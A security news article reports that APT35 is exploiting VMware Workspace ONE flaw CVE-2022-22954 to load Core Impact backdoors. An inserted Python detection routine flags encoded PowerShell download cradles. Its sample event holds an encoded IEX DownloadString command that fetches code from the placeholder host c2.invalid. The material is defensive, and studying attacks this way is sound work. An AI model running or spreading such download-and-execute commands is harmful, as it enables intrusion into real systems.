Hackers exploit critical VMware RCE flaw to install backdoors, APT35, Iran, Remote Code Execution, VMware

Advanced hackers are actively exploiting a critical remote code execution (RCE) vulnerability, CVE-2022-22954, that affects VMware Workspace ONE Access (formerly called VMware Identity Manager).

The issue was addressed in a security update 20 days ago, along with two more RCEs, CVE-2022-22957 and CVE-2022-22958, that also affect VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.

Soon after the public disclosure of the flaws, proof-of-concept (PoC) exploit code appeared publicly, enabling attackers to target vulnerable VMware product deployments. VMware has confirmed that CVE-2022-22954 is being exploited in the wild.

Now, researchers at Morphisec report seeing exploitation from advanced persistent threat (APT) actors, particularly an Iranian hacking group tracked as APT35, aka “Rocket Kitten.”

Attack details

The adversaries gain initial access to the environment by exploiting CVE-2022-22954, the only one in the RCE trio that doesn’t require administrative access to the target server and also has a publicly available PoC exploit.

The attack starts with executing a PowerShell command on the vulnerable service (Identity Manager), which launches a stager.

The stager then fetches the PowerTrash loader from the command and control (C2) server in a highly obfuscated form and loads a Core Impact agent into the system memory.


The APT35 attack flow (Morphisec)
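As an added illustration, not code from the article or the Morphisec report, the Python routine below scores process-creation events for the pattern described above: PowerShell launched under the account of the web service, carrying an encoded command that decodes to a download-and-execute-in-memory cradle. The service account name "horizon", the event fields and the sample events are constructed assumptions, not values from the report.

```python
import base64
import re
# Download-and-execute-in-memory cradle keywords; one hit flags the event.
CRADLE = re.compile(
    r"DownloadString|DownloadData|Invoke-WebRequest|Net\.WebClient|"
    r"Invoke-Expression|\bIEX\b|FromBase64String|Reflection\.Assembly", re.I)
# -EncodedCommand and its abbreviations, followed by the base64 payload.
ENCODED = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Assumption: the account the vulnerable web service runs as; set per site.
WEB_SERVICE_USERS = {"horizon"}
def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64) or ''."""
    m = ENCODED.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""
def score_event(event):
    """Return (score, reasons) for one process-creation event dict."""
    image = event.get("image", "").lower()
    reasons = []
    if not (image.endswith("powershell.exe") or image.endswith("pwsh")):
        return 0, reasons
    if event.get("user", "").lower() in WEB_SERVICE_USERS:
        reasons.append("PowerShell spawned under the web service account")
    cmd = event.get("command_line", "")
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.append("encoded command line")
    if CRADLE.search(cmd) or CRADLE.search(decoded):
        reasons.append("download/in-memory execution cradle")
    return len(reasons), reasons
def triage(events):
    """Return [(user, score, reasons)] for every event that scored > 0."""
    hits = []
    for e in events:
        score, reasons = score_event(e)
        if score:
            hits.append((e.get("user"), score, reasons))
    return hits
def _enc(script):  # builds the constructed sample's encoded payload
    return base64.b64encode(script.encode("utf-16-le")).decode()
# Constructed sample events (not telemetry from the report); c2.invalid is a placeholder.
SAMPLE_EVENTS = [
    {"user": "horizon", "image": "powershell.exe", "command_line":
     "powershell.exe -nop -w hidden -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/s')")},
    {"user": "backupadmin", "image": "powershell.exe",
     "command_line": "powershell.exe -File C:\\scripts\\backup.ps1"},
]
```

Running `triage(SAMPLE_EVENTS)` flags only the first event, with all three reasons; the routine is a starting point for a SIEM rule, not a replacement for patching.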

Core Impact is a legitimate penetration testing tool that is abused for nefarious purposes in this case, similar to how Cobalt Strike is deployed in malicious campaigns.

This isn’t a novel element, though. Trend Micro has reported Core Impact abuse in the past by APT35, the activity dating as far back as 2015.

“Morphisec research observed attackers already exploiting this vulnerability (CVE-2022-22954) to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons” – Morphisec

Morphisec CTO Michael Gorelik told BleepingComputer that the attacker tried lateral movement on the network, although the backdoor was stopped.

“With privileged access, these types of attacks may be able to bypass typical defenses including antivirus (AV) and endpoint detection and response (EDR),” Morphisec adds in the report.

Links to hosting firm

Morphisec was able to retrieve the stager server’s C2 address, the Core Impact client version, and the 256-bit encryption key used for C2 communication, and eventually linked the operation to a specific person named Ivan Neculiti.

There’s an entry on the ‘Hucksters’ fraud exposure database under that name, listing corporate entities registered in Moldova, Russia, and the UK, including a hosting firm that, according to the database, supports all kinds of illegal websites as well as spam and phishing campaigns.

It is unclear if Neculiti or the associated companies were in any way, knowingly or not, involved in cybercriminal campaigns.

BleepingComputer has contacted both hosting firms for a comment on the allegations made in Morphisec’s report, and we will update this post if we get a reply.
